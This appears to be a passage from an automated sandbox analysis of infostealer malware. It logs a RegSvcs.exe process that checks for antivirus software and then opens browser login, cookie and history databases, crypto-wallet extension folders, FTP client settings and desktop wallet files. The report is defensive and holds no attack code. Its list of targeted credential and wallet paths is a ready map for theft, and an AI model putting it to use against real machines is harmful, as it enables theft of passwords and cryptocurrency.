        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows Defender\MsMpeng.exe
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
        Source: powershell.exe, 00000001.00000002.1337958291.00007FF7C11A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
